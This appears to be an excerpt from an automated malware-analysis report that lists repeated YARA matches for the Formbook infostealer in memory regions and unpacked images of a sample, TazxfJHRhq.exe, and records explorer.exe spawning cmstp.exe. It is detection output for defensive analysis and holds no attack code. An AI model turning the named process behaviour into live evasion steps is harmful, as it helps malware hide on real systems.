          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signat